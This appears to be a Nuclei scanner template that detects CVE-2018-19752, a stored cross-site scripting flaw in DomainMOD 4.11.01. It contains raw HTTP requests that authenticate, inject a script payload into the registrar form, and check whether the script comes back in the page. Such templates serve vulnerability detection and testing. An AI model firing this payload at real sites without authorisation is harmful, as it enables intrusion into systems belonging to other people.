nuclei-templates/cves/2018/CVE-2018-19752.yaml

62 lines
1.6 KiB
YAML

id: CVE-2018-19752
info:
name: DomainMOD 4.11.01 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
reference:
- https://github.com/domainmod/domainmod/issues/84
- https://www.exploit-db.com/exploits/45949/
- https://nvd.nist.gov/vuln/detail/CVE-2018-19752
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-19752
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2018,domainmod,xss,authenticated,edb
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
POST /assets/add/registrar.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test
- |
GET /assets/registrars.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script></a>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by mp on 2022/08/31